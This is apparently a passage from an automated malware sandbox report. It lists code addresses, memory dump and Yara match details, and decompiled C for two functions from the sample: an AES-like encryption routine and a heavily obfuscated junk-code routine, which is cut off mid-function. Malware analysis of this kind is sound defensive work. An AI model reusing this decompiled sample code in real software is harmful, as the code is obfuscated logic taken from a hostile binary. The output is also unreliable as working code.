                                                          0x00408d9e
                                                          0x00408da5
                                                          0x00408da8
                                                          0x00408dab
                                                          0x00408db4
                                                          0x00408db7
                                                          0x00408dba
                                                          0x00408dd2
                                                          0x00408dd9
                                                          0x00408ddb
                                                          0x00408dde
                                                          0x00408de1
                                                          0x00408dea
                                                          0x00408df1
                                                          0x00408df4
                                                          0x00408df7
                                                          0x00408e06
                                                          0x00408e0d
                                                          0x00408e10
                                                          0x00408e13
                                                          0x00408e1c
                                                          0x00408e26
                                                          0x00408e29
                                                          0x00408e35
                                                          0x00408e38
                                                          0x00408e3f
                                                          0x00408e42
                                                          0x00408e45
                                                          0x00408e4a
                                                          0x00408e4d
                                                          0x00408e56
                                                          0x00408e67
                                                          0x00408e6a
                                                          0x00408e6d
                                                          0x00408e74
                                                          0x00408e77
                                                          0x00408e7a
                                                          0x00408e7d
                                                          0x00408e7f
                                                          0x00408e82
                                                          0x00408e85
                                                          0x00408e8e
                                                          0x00408e93
                                                          0x00408e93
                                                          0x00408ea8
                                                          0x00408eab
                                                          0x00408eae
                                                          0x00408eb5
                                                          0x00408eb8
                                                          0x00408ebb
                                                          0x00408ed0
                                                          0x00408ed7
                                                          0x00408eda
                                                          0x00408ede
                                                          0x00408ee1
                                                          0x00408ee6
                                                          0x00408ee9
                                                          0x00408ef8
                                                          0x00408efb
                                                          0x00408f02
                                                          0x00408f05
                                                          0x00408f08
                                                          0x00408f0b
                                                          0x00408f0e
                                                          0x00408f16
                                                          0x00408f24
                                                          0x00408f27
                                                          0x00408f2a
                                                          0x00408f2a
                                                          0x00408f31
                                                          0x00408f34
                                                          0x00408f37
                                                          0x00408f3f
                                                          0x00408f4d
                                                          0x00408f50
                                                          0x00408f57
                                                          0x00408f5a
                                                          0x00408f5d
                                                          0x00408f60
                                                          0x00408f63
                                                          0x00408f6c
                                                          0x00408f73
                                                          0x00408f73
                                                          0x00408f79
                                                          0x00408f92
                                                          0x00408f95
                                                          0x00408f9c
                                                          0x00408f9f
                                                          0x00408fa2
                                                          0x00408fb4
                                                          0x00408fbe
                                                          0x00408fc1
                                                          0x00408fca
                                                          0x00408fcd
                                                          0x00408fd4
                                                          0x00408fd7
                                                          0x00408fdd
                                                          0x00408ff0
                                                          0x00408ff7
                                                          0x00408ffa
                                                          0x00408ffd
                                                          0x00409000
                                                          0x00409009
                                                          0x0040900c
                                                          0x0040901f
                                                          0x00409022
                                                          0x0040902c
                                                          0x0040902f
                                                          0x00409031
                                                          0x0040903a
                                                          0x0040903d
                                                          0x00409050
                                                          0x00409056
                                                          0x00409059
                                                          0x00409060
                                                          0x00409062
                                                          0x00409065
                                                          0x00409068
                                                          0x0040906b
                                                          0x0040906e
                                                          0x00409071
                                                          0x0040907a
                                                          0x0040907f
                                                          0x00409082
                                                          0x00409082
                                                          0x00409095
                                                          0x00409098
                                                          0x0040909b
                                                          0x004090a2
                                                          0x004090a5
                                                          0x004090a8
                                                          0x004090ab
                                                          0x004090be
                                                          0x004090c1
                                                          0x004090cc
                                                          0x004090cf
                                                          0x004090db
                                                          0x004090de
                                                          0x004090e4
                                                          0x004090e7
                                                          0x004090ea
                                                          0x004090f1
                                                          0x00409101
                                                          0x00409104
                                                          0x0040910a
                                                          0x0040910d
                                                          0x00409114
                                                          0x00409116
                                                          0x00409119
                                                          0x0040911c
                                                          0x0040911f
                                                          0x00409122
                                                          0x00409129
                                                          0x00409138
                                                          0x0040913b
                                                          0x00409142
                                                          0x00409145
                                                          0x00409148
                                                          0x0040914b
                                                          0x0040914e
                                                          0x00409151
                                                          0x00409154
                                                          0x0040915d
                                                          0x0040916e
                                                          0x00409176
                                                          0x0040917c
                                                          0x0040917f
                                                          0x00409181
                                                          0x00409184
                                                          0x00409187
                                                          0x00409194

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.771173980.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (
                                                          • API String ID: 0-3887548279
                                                          • Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                                          • Instruction ID: 8ad233646052dc3e62b8ed2cbc52c1af8ad6dc8a0ae32faa969373aa01f020fc
                                                          • Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                                          • Instruction Fuzzy Hash: 85021DB6E006189FDB14CF9AC8805DDFBF2FF88314F1AC1AAD859A7355D6746A418F80
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00402FB0, Relevance: .4, Instructions: 435COMMONCrypto
                                                          Download Yara Rule
                                                          C-Code - Quality: 26%
                                                          			E00402FB0(void* __eax, signed int* __ecx, signed int* __edx, signed int _a4, signed int* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* _t273;
				signed int _t274;
				signed int _t282;
				signed int* _t358;
				signed int _t383;
				signed int* _t409;
				signed int _t429;
				signed int _t458;
				signed int _t478;
				signed int _t560;
				signed int _t603;

				_t273 = __eax;
				asm("ror edi, 0x8");
				asm("rol edx, 0x8");
				_t458 = ( *__edx & 0xff00ff00 |  *__edx & 0x00ff00ff) ^  *__ecx;
				asm("ror ebx, 0x8");
				asm("rol edx, 0x8");
				_v20 = _t458;
				_v8 = (__edx[1] & 0xff00ff00 | __edx[1] & 0x00ff00ff) ^ __ecx[1];
				asm("ror ebx, 0x8");
				asm("rol edx, 0x8");
				_t282 = (__edx[2] & 0xff00ff00 | __edx[2] & 0x00ff00ff) ^ __ecx[2];
				asm("ror esi, 0x8");
				asm("rol edx, 0x8");
				_v12 = (__edx[3] & 0xff00ff00 | __edx[3] & 0x00ff00ff) ^ __ecx[3];
				asm("ror edx, 0x10");
				asm("ror esi, 0x8");
				asm("rol esi, 0x8");
				_v24 = _t282;
				_t429 =  *(__eax + 4 + (_t282 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[4];
				asm("ror esi, 0x10");
				asm("ror ebx, 0x8");
				asm("rol ebx, 0x8");
				_t603 =  *(__eax + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t282 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[5];
				asm("ror ebx, 0x8");
				asm("ror edi, 0x10");
				asm("rol edi, 0x8");
				_v16 =  *(__eax + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[6];
				asm("ror edi, 0x10");
				asm("ror ebx, 0x8");
				asm("rol ebx, 0x8");
				_t409 =  &(__ecx[8]);
				_v12 =  *(__eax + 4 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^  *(_t409 - 4);
				_t478 = (_a4 >> 1) - 1;
				_a4 = _t478;
				if(_t478 != 0) {
					do {
						asm("ror edi, 0x10");
						asm("ror ebx, 0x8");
						asm("rol ebx, 0x8");
						_v20 =  *(__eax + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) ^  *_t409;
						asm("ror edi, 0x10");
						asm("ror ebx, 0x8");
						asm("rol ebx, 0x8");
						_v8 =  *(__eax + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[1];
						asm("ror ebx, 0x8");
						asm("ror edi, 0x10");
						asm("rol edi, 0x8");
						_t383 =  *(__eax + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[2];
						asm("ror edi, 0x10");
						asm("ror edx, 0x8");
						asm("rol edx, 0x8");
						_v24 = _t383;
						_t560 =  *(__eax + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[3];
						asm("ror edx, 0x10");
						asm("ror esi, 0x8");
						asm("rol esi, 0x8");
						_t429 =  *(__eax + 4 + (_t383 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t560 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[4];
						asm("ror esi, 0x10");
						asm("ror ebx, 0x8");
						asm("rol ebx, 0x8");
						_t603 =  *(__eax + 4 + (_t560 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t383 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[5];
						_v12 = _t560;
						asm("ror edi, 0x8");
						asm("ror ebx, 0x10");
						asm("rol ebx, 0x8");
						_v16 =  *(__eax + 4 + (_t560 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[6];
						asm("ror ebx, 0x10");
						asm("ror edi, 0x8");
						asm("rol edi, 0x8");
						_t409 =  &(_t409[8]);
						_t205 =  &_a4;
						 *_t205 = _a4 - 1;
						_v12 =  *(__eax + 4 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^  *(_t409 - 4);
					} while ( *_t205 != 0);
				}
				asm("ror ebx, 0x8");
				asm("rol edi, 0x8");
				 *_a8 = (( *(_t273 + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_v12 & 0x000000ff) * 4) & 0x000000ff ^  *_t409) & 0xff00ff00 | (( *(_t273 + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_v12 & 0x000000ff) * 4) & 0x000000ff ^  *_t409) & 0x00ff00ff;
				asm("ror ebx, 0x8");
				asm("rol edi, 0x8");
				_a8[1] = (( *(_t273 + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t429 & 0x000000ff) * 4) & 0x000000ff ^ _t409[1]) & 0xff00ff00 | (( *(_t273 + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t429 & 0x000000ff) * 4) & 0x000000ff ^ _t409[1]) & 0x00ff00ff;
				asm("ror ebx, 0x8");
				asm("rol edi, 0x8");
				_t358 = _a8;
				_t358[2] = (( *(_t273 + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t603 & 0x000000ff) * 4) & 0x000000ff ^ _t409[2]) & 0xff00ff00 | (( *(_t273 + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t603 & 0x000000ff) * 4) & 0x000000ff ^ _t409[2]) & 0x00ff00ff;
				_t274 =  *(_t273 + 5 + (_v16 & 0x000000ff) * 4) & 0x000000ff;
				asm("ror ecx, 0x8");
				asm("rol edi, 0x8");
				_t358[3] = (( *(_t273 + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^ _t274 ^ _t409[3]) & 0xff00ff00 | (( *(_t273 + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^ _t274 ^ _t409[3]) & 0x00ff00ff;
				return _t274;
			}



















                                                          0x00402fb0
                                                          0x00402fbf
                                                          0x00402fc8
                                                          0x00402fd6
                                                          0x00402fda
                                                          0x00402fe3
                                                          0x00402ff4
                                                          0x00402ff7
                                                          0x00402ffc
                                                          0x00403005
                                                          0x00403013
                                                          0x00403018
                                                          0x00403021
                                                          0x00403031
                                                          0x00403051
                                                          0x00403054
                                                          0x00403066
                                                          0x0040306b
                                                          0x00403080
                                                          0x0040309d
                                                          0x004030a0
                                                          0x004030b1
                                                          0x004030c6
                                                          0x004030e6
                                                          0x004030e9
                                                          0x004030fb
                                                          0x00403119
                                                          0x00403136
                                                          0x00403139
                                                          0x0040314b
                                                          0x00403160
                                                          0x00403166
                                                          0x0040316e
                                                          0x0040316f
                                                          0x00403172
                                                          0x00403180
                                                          0x00403190
                                                          0x004031a2
                                                          0x004031b4
                                                          0x004031d0
                                                          0x004031e3
                                                          0x004031f0
                                                          0x00403201
                                                          0x00403218
                                                          0x0040323a
                                                          0x0040323d
                                                          0x0040324e
                                                          0x00403269
                                                          0x00403280
                                                          0x00403283
                                                          0x00403295
                                                          0x0040329d
                                                          0x004032b2
                                                          0x004032cf
                                                          0x004032d2
                                                          0x004032e3
                                                          0x00403307
                                                          0x00403317
                                                          0x0040331a
                                                          0x0040332c
                                                          0x00403344
                                                          0x00403347
                                                          0x0040335a
                                                          0x00403367
                                                          0x00403379
                                                          0x00403391
                                                          0x004033b4
                                                          0x004033b7
                                                          0x004033c9
                                                          0x004033de
                                                          0x004033e4
                                                          0x004033e4
                                                          0x004033e7
                                                          0x004033e7
                                                          0x00403180
                                                          0x0040344b
                                                          0x00403454
                                                          0x00403462
                                                          0x004034c0
                                                          0x004034c9
                                                          0x004034d7
                                                          0x00403539
                                                          0x00403542
                                                          0x0040354f
                                                          0x00403552
                                                          0x0040359e
                                                          0x004035aa
                                                          0x004035b3
                                                          0x004035c0
                                                          0x004035c7

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.771173980.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                                          • Instruction ID: 3a980b568be2ae1ecdc62ef5b70c599cea3cbb84bd4cfa04f309e58bee3fdca8
                                                          • Opcode Fuzzy Hash: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                                          • Instruction Fuzzy Hash: 37026E73E547164FE720CE4ACDC4725B3A3EFC8301F5B81B8CA142B613CA39BA525A90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0041B84A, Relevance: .4, Instructions: 419COMMONCrypto
                                                          Download Yara Rule
                                                          C-Code - Quality: 52%
                                                          			E0041B84A() {
				void* _t67;
				signed int _t68;
				signed int _t69;
				signed int _t74;
				signed int _t77;
				void* _t80;
				signed int _t84;
				signed int _t85;
				signed int _t86;
				signed int _t88;
				signed int _t92;
				signed int _t94;
				signed int _t97;
				signed int _t98;
				signed int _t104;

				_t68 = _t67 + 0xae0d00e9;
				asm("rol byte [0x12d2f9a8], 0x45");
				if(_t68 < 0) {
					_t27 = __eax;
					__eax =  *0x5182dd79;
					 *0x5182dd79 = _t27;
					__esi = __esi ^ 0xf0ad8305;
					asm("sbb ecx, 0x32f64a1d");
					 *0xaa6ed101 =  *0xaa6ed101 + __esp;
					 *0x824b03a3 =  *0x824b03a3 ^ __eax;
					__ecx = __ecx + 1;
					asm("rol dword [0xb4981707], 0x7c");
					asm("adc cl, [0x71cddeb6]");
					__eax = __eax - 0xcce08d68;
					 *0x89ce8205 =  *0x89ce8205 >> 0xea;
					__esi = __esi | 0x23d39d8e;
					 *0xb614ada1 =  *0xb614ada1 << 0x7c;
					__eax = 0x4b81cf61;
					__edi = __edi + 1;
					__ebp = __ebp &  *0xcf3d49fb;
					asm("sbb ebx, [0x43531992]");
					__ecx = 0xc3e7478f;
					__esp = 0xbe935007;
					 *0x6b66be0e = 0x4b81cf61;
					__ebp = __ebp - 1;
					asm("cmpsb");
					 *0x60ca7994 =  *0x60ca7994 & __edx;
					 *0x7cf77019 =  *0x7cf77019 | __esi;
					 *0xc52c10ff =  *0xc52c10ff - __edi;
					 *0x7f5f14 =  *0x7f5f14 + __dh;
					_push(__esi);
					 *0x19c95b30 =  *0x19c95b30 << 0x6c;
					__ah = __ah - 0x2c;
					__bh = __bh & 0x00000020;
					__edi = __edi &  *0x2d55d0b;
					asm("adc dh, 0x32");
					_t32 = __ebp;
					__ebp =  *0x633002bc;
					 *0x633002bc = _t32;
					 *0xf8b95dc9 =  *0xf8b95dc9 >> 0xfa;
					__ecx = __esi;
					asm("sbb edi, 0xd721323e");
					 *0x262c38e7 =  *0x262c38e7 & __bl;
					__esi = __esi |  *0xdbab56f1;
					__al = __al & 0x000000e4;
					asm("rcr dword [0x79900f9b], 0xda");
					__esp =  *0x76cd75f7;
					 *0x76cd75f7 = 0xbe935007;
					__esp =  *0x76cd75f7 ^  *0x6ccd5236;
					 *0xca60b1e5 =  *0xca60b1e5 | __ah;
					__eax = __edi;
					__dh = __dh ^  *0x64bd3be2;
					 *0x87fafaca =  *0x87fafaca ^ __ch;
					__ecx =  *0xb7d83cc2;
					 *0xb7d83cc2 = 0xc3e7478f;
					if(( *0xe197c0ec & 0x4b81cf61) < 0) {
						 *0x19a27f73 =  *0x19a27f73 | __edi;
						_t41 = __edi;
						__edi =  *0xbfea6b9c;
						 *0xbfea6b9c = _t41;
						asm("movsw");
						 *0xbfe51b05 =  *0xbfe51b05 & __ebx;
						if( *0xbfe51b05 == 0) {
							 *0xff059f7b =  *0xff059f7b >> 0x21;
							 *0x9f73b4db =  *0x9f73b4db + __ecx;
							asm("sbb [0x94b3eb05], ebx");
							asm("adc cl, [0x9f7c2aa8]");
							if(__edi ==  *0x269bd305) {
								__edi = __edi -  *0xff059f7a;
								_push( *0x9f6aa2ba);
								 *0xdb4b1004 =  *0xdb4b1004 >> 0x49;
								_pop(__eax);
								__dh = __dh - 4;
								asm("rcr byte [0x58dc3e18], 0xb8");
								asm("ror byte [0xd628ae04], 0xb5");
								_pop(__eax);
								__bh = __bh ^  *0xd421ed04;
								_pop(__eax);
								asm("ror dword [0x91c74005], 0x49");
								_pop(__esi);
								 *0xcb98059f =  *0xcb98059f | __ecx;
								_t42 = __esi;
								__esi =  *0x59f689e;
								 *0x59f689e = _t42;
								asm("rcr dword [0x6697bd29], 0x8b");
								asm("sbb ecx, 0xd3b6079f");
								if( *0xcb98059f < 0) {
									__ecx =  *0x177a807d * 0x7ae;
									 *0x5b438c6c =  *0x5b438c6c ^  *0x177a807d * 0x000007ae;
									__edi = __edi |  *0x7ae156f;
									__ebx = __ebx & 0x9dd4592b;
									if(__ebx < 0) {
										__ebp =  *0x7ae1b7d * 0x7c66;
										asm("adc [0x13a0ee10], al");
										asm("scasb");
										__bh = __bh |  *0xfe93e008;
										__eax = 0x981c760;
										_t43 = __ebx;
										__ebx =  *0x6fee0831;
										 *0x6fee0831 = _t43;
										_push( *0xe26a89fd);
										__esi = __esi &  *0xc8a09bfb;
										__al = __al | 0x000000b1;
										 *0xfe08313e =  *0xfe08313e + __ebx;
										if( *0xfe08313e <= 0) {
											__edx =  *0x465fdd7f * 0x27ce;
											__esi =  *0x41a50931;
											__dl = __dl ^  *0x339fe928;
											_pop(__ebp);
											__eax = 0x981c760 |  *0x6159cb3b;
											asm("rol dword [0xef3b7e2b], 0x9");
											asm("adc esp, 0xf959c609");
											__al = __al -  *0x47fb0a30;
											asm("sbb eax, [0x87200aef]");
											asm("adc [0xa9c0080c], ch");
											asm("adc [0x6656e339], edi");
											__edi = __edi +  *0xfe941d0b;
											if(__edi <= 0) {
												__esi =  *0xf31b697f * 0xfb8;
												asm("adc ebx, 0x8962f");
												__ecx =  *0xd00b4269 * 0x3fb3;
												__eax = __eax ^  *0xa3c01131;
												__edi = __edi + 0xbf037185;
												_push(__edi);
												asm("sbb [0x2faff2ef], esi");
												asm("movsw");
												 *0xddce14c1 =  *0xddce14c1 << 0xc0;
												if( *0xddce14c1 >= 0) {
													__edx =  *0x50c2e67c * 0xc46e;
													 *0xe8be6d1 =  *0xe8be6d1 & __ecx;
													__edx =  *0x50c2e67c * 0xc46e - 1;
													__edx =  *0x50c2e67c * 0x0000c46e - 0x00000001 | 0x1288dddc;
													__ebp = __ebp - 1;
													__esi =  *0xdefdea26;
													__bh = __bh & 0x000000b6;
													__eax = __eax +  *0xedaaa1b;
													asm("rcl dword [0x3b88609], 0xae");
													 *0x557bee0b =  *0x8dd6e69d;
													__cl = __cl + 0xb7;
													__edi = __edi ^  *0x69642ff;
													_pop(__ebp);
													asm("cmpsw");
													__esp = __esp - 1;
													__cl =  *0xcdc7702;
													__ebp = __ebp - 1;
													__dh = 0x80;
													asm("ror dword [0x2b2f8a8f], 0xc6");
													if(__cl >=  *0x5f5695d7) {
														__ecx =  *0x8107707c * 0x4883;
														_push(0xae58398e);
														__esp = __esp -  *0x90769816;
														__ebx = __ebx | 0xdf3e5d81;
														 *0xf51b5308 =  *0xf51b5308 >> 0xc4;
														__dl = __dl & 0x0000001a;
														 *0xc2d110de =  *0xc2d110de + __esp;
														asm("sbb [0x4d31d4c8], ebx");
														asm("rcl byte [0xfc11c81a], 0x81");
														asm("sbb eax, [0x94840389]");
														 *0x8de4603c =  *0x8de4603c << 0xf9;
														asm("lodsd");
														_push(__edx);
														if( *0x8de4603c < 0) {
															 *0x7a9eb271 =  *0x7a9eb271 & __ebx;
															L1();
															asm("sbb edi, [0x441cc1e8]");
															_t54 = __ch;
															__ch =  *0x246f6c32;
															 *0x246f6c32 = _t54;
															asm("sbb [0x3ab8acd1], edx");
															asm("ror dword [0x8f8dcf05], 0x74");
															asm("adc edx, [0xe509035]");
															 *0xd3a6ace = __edi;
															 *0x7be072b6 = __bh;
															__edi = __edi +  *0x4605e762;
															__bh = __bh &  *0x14081a22;
															 *0x124a0ef =  *0x124a0ef | __esi;
															_t59 = __cl;
															__cl =  *0xa2e9aa30;
															 *0xa2e9aa30 = _t59;
															 *0x4dc618be =  *0x4dc618be - 0x4b81cf61;
															 *0xa103767 =  *0xa103767 >> 0xb0;
															asm("adc eax, [0xbff6bf26]");
															if( *0xa103767 <= 0) {
																__esi = __esi +  *0xacb09b77;
																asm("adc eax, [0xc22145ba]");
																 *0x341c0337 =  *0x341c0337 | 0x4b81cf61;
																 *0x37258ae3 =  *0x37258ae3 << 0x4b;
																__ebp = __ebp &  *0xb36ce535;
																__esi = __esi + 1;
																asm("stosd");
																asm("ror byte [0xe5f0040a], 0xbb");
																__ch = __ch - 0x32;
																__dh = 0x36;
																__ebx = __ebx + 0xaadcc103;
																 *0xae0c22cc =  *0xae0c22cc << 0xfc;
																__cl = __cl -  *0x4a9db7c9;
																__al = __al ^  *0xa4dbd13c;
																__eax = __eax ^ 0xae36f239;
																if(0x4b81cf61 >= 0) {
																	_t62 = __eax;
																	__eax =  *0x83f79a70;
																	 *0x83f79a70 = _t62;
																	_pop(__eax);
																	asm("ror byte [0xa2bf1282], 0x7");
																	asm("sbb ebx, [0xe338ecb]");
																	__ebp = __ebp ^  *0x2f144fd4;
																	_t63 = __esi;
																	__esi =  *0xbf24a403;
																	 *0xbf24a403 = _t63;
																	if(__ebp == 0) {
																		asm("adc [0xf514b975], esp");
																		asm("rol byte [0x6511e4b6], 0xe4");
																		__ebp =  *0x8fad1367;
																		__dl = __dl -  *0xc1eb2f1c;
																		_push( *0x8fad1367);
																		asm("rcr byte [0x2ba60518], 0xd1");
																		__edi =  *0x8a436e6a * 0xc94b;
																		__ah = __ah &  *0x3daec9e7;
																		asm("sbb ebx, 0x1966619c");
																		asm("rol byte [0x291317b6], 0x75");
																		_push(__esi);
																		__ecx = __ecx - 0x2e4b9494;
																		__esp = __esp - 0xb0718c03;
																		asm("sbb esi, [0xe9b19611]");
																		__cl = __cl - 0xf2;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
				L1:
				_t98 = _t97 |  *0x637c809;
				_push(_t88);
				_t69 = _t68 &  *0x4b550def;
				_push(_t69);
				 *0x6ab7e3b7 = _t88;
				 *0x600ce4f9 =  *0x600ce4f9 >> 0x1d;
				_t92 = _t92 +  *0xeb64decf;
				_t85 = _t84 -  *0x6ab9a5b2;
				asm("rol dword [0x870b336], 0x35");
				asm("rol dword [0xe44d3266], 0x10");
				_push(_t85);
				asm("rol dword [0x1d590531], 0xff");
				asm("adc [0xd9f46f6], bl");
				_t88 =  *0x6ab7e3b7 - 0xffffffffc64be17c;
				 *0x49d7d139 =  *0x49d7d139 | _t94;
				asm("sbb [0x574a13e4], ah");
				 *0xa2f85b12 = _t69 - 0x3454fd67;
				asm("sbb ah, [0x4d4445e2]");
				_t97 =  *0x9f8a858d;
				 *0x9f8a858d = _t98;
				asm("rol dword [0xa8c0ba9e], 0x1a");
				_t68 =  *0xa2f85b12 + 0x00000001 &  *0x3f407c10;
				asm("adc [0xdcfd40bf], ebx");
				asm("rcr byte [0x61d063e4], 0x6f");
				_t84 = _t85 &  *0x9fe4a5be;
				_t94 = _t94 + 1;
				 *0xdbd7fe0a =  *0xdbd7fe0a >> 0x51;
				asm("lodsd");
				asm("sbb [0xbb63f084], ah");
				 *0x8e096699 =  *0x8e096699 ^ _t104;
				if( *0x8e096699 <= 0) {
					_t92 = _t92 -  *0xeff1cec4;
					_t97 = _t97 ^ 0xbeea6505;
					if(_t97 != 0) {
						_pop(_t68);
						asm("adc bl, [0x9f061214]");
						asm("scasd");
						if(( *0xe10a9f74 & _t88) > 0) {
							 *0xef0f32f7 =  *0xef0f32f7 >> 0x2f;
							asm("adc edi, 0x9acac10f");
							_t94 = _t94 ^  *0x8e770e35;
							asm("rcr dword [0x53ce4a35], 0xb4");
							_t84 = _t84 | 0x00000012;
							 *0x356a7a91 =  *0x356a7a91 >> 0x8b;
							 *0xd54e9fde =  *0xd54e9fde & _t104;
							asm("stosb");
							asm("adc esp, [0x53c16b96]");
							 *0xaacca300 =  *0xaacca300 << 0xa6;
							_t88 = 0xb9c32b03;
							asm("sbb bl, [0xa9b9faa2]");
							_t78 =  *0xa66687e * 0x39f1 -  *0x4cc05705;
							 *0xfcd19325 =  *0xfcd19325 + _t84;
							 *0x17764bcf =  *0x17764bcf + _t68;
							_push( *0x1a3e9ec7);
							_t68 = 0x17623525;
							if( *0xaaf62fbc < 0xb9c32b03) {
								_t68 =  *0xcd1a597d * 0x4a0c;
								if(_t68 < 0) {
									_t97 = _t97 ^  *0x26ca4079;
									asm("sbb al, [0x4434ff32]");
									 *0x42cc7220 =  *0x42cc7220 << 8;
